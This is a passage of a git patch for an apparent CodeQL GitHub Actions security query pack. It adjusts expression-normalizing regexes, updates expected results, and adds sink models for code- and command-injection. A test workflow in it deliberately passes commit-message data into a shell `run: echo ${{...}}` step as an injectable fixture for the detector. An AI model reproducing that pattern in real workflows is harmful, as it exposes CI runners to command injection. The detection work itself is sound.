@@ -5,10 +5,9 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.replaceAll("['", ".") - .replaceAll("']", "") - .replaceAll("[\"", ".") - .replaceAll("\"]", "") + //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } } @@ -45,6 +44,8 @@ class Expression extends AstNode instanceof ExpressionImpl { string getExpression() { result = expression } string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7ebed407c0f..b05dd852dbf 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -30,8 +30,8 @@ string getASimpleReferenceExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fb31fe20990..702a454645c 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -8,6 +8,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import PartialFlow::PartialPathGraph diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 628b6e6f1bf..b9fa152e49a 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -12,7 +12,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event['head_commit']['message'] }} find: 'foo' replace: '' - id: step1 @@ -34,4 +34,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 38884b3eaef..dfed1edb40a 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | @@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -254,7 +254,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 21a9978c54f..d22e9833f52 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | @@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -261,7 +261,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 446a2dc2673085a24960ad3f293e67f247d59cd5 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 0096/1267] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml | 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 00000000000..e3d97adf69d --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e..cd409f38b59 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe222..ad65775e58d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", 